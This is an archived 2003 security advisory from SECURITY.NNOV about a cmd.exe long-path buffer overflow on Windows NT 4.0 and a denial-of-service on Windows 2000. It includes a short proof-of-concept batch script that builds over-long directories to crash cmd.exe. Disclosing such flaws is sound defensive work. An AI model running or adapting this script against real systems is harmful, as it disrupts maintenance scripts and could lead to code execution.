SECURITY.NNOV: Windows NT 4.0/2000 cmd.exe long path buffer overflow/DoS

• Previous message: Matthew S. Hallacy: "Re: Eggdrop arbitrary connection vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Title:                  Buffer overflow/DoS against cmd.exe
                        for Windows NT 4.0/2000
Affected:               Microsoft Windows NT 4.0 (buffer overflow)
                        Microsoft Windows 2000 (DoS)
Vendor:                 Microsoft
Risk:                   Average for Windows NT 4.0
                        Low for Windows 2000
Exploitable:            Yes
Remote:                 No
Vendor Notified:        January, 30 2003

I. Intro

cmd.exe  is  Windows  NT  OS family command processor. It's also used to
process  .bat  and .cmd batch files. Many system administrator run batch
files with elevated privileges for system maintenance.

II. Vulnerability

cmd.exe  has  a  flow  in  processing  cd  command on long path name. On
Windows  NT  4.0 it may cause buffer overflow, on Windows 2000 - failure
of batch file processing.

III. Details

NTFS  file system allows to create paths of almost unlimited length. But
Windows  API  does  not  allow  path  longer  than 256 bytes. To prevent
Windows   API   from   checking  requested  path \\?\ prefix may be used
for filename. This is documented feature of Windows API.

cmd.exe from Windows NT 4.0 has trivial buffer overflow in CD command if
destination  path  is longer than 256 characters. This vulnerability may
be trivially exploited to execute code.

cmd.exe  from  Windows 2000 has no buffer overflow, but than changing to
directory  with  a path slightly longer than 256 characters (for example
260  characters) cmd.exe becomes "jailed" in this directory, it means cd
.. command will fail. It may cause DoS against maintenance batch script.

IV. Exploitation

@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%\
c:
cd \
cd AAAAAAAAAAAA*
cd AAAAAAAAAAAA*
cd BBBBBBBBBBBB*
cd ..

creates  directory  with  2  subdirectory. First one demonstrates buffer
overflow  on  Windows  NT  4.0  (second cd AAAAAAAAA* command will crash
cmd.exe  with EIP overwritten) second one demonstrates cmd.exe to change
directory to AA...\BB..., but cd .. command will fail.

V. Vendor

Microsoft acknowledged problem.

-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)

• Next message: Thor Larholm: "Epic Games threatens to sue security researchers"
• Previous message: Matthew S. Hallacy: "Re: Eggdrop arbitrary connection vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Feb 11 2003 - 09:38:35 PST